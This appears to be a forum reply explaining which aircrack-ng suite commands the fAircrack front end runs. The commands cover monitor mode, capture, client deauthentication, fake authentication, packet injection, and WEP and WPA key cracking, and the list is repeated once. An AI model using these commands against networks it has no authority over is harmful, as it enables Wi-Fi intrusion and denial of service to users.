Yes, fAircrack implements this on the Monitor Tab using the Enable Injection button. No, fAircrack uses ifconfig, iwconfig commands to put wlan0 into monitor / managed mode. Code: sudo ifconfig wlan0 down sudo iwconfig wlan0 mode Monitor sudo ifconfig wlan0 up fAircrack uses for capture Code: sudo airodump-ng --channel X --bssid BSSID --write FILE wlan0 for deauthentication Code: sudo aireplay-ng -0 10 -a BSSID wlan0 for authentication Code: sudo aireplay-ng -1 5 -q 10 -a BSSID -h MYMAC wlan0 for injection Code: sudo aireplay-ng -3 -b BSSID -h MYMAC wlan0 for interactive injection (since v0.46) Code: sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSID -h MYMAC wlan0 to crack WEP key Code: aircrack-ng -l KEYFILE CAPFILES to crack WPA key using wordlist Code: aircrack-ng WORDLIST -l KEYFILE CAPFILES to search for APs and clients Code: sudo airodump-ng -w FILE wlan0
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode Monitor sudo ifconfig wlan0 up
sudo airodump-ng --channel X --bssid BSSID --write FILE wlan0
sudo aireplay-ng -0 10 -a BSSID wlan0
sudo aireplay-ng -1 5 -q 10 -a BSSID -h MYMAC wlan0
sudo aireplay-ng -3 -b BSSID -h MYMAC wlan0
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSID -h MYMAC wlan0
aircrack-ng -l KEYFILE CAPFILES
aircrack-ng WORDLIST -l KEYFILE CAPFILES
sudo airodump-ng -w FILE wlan0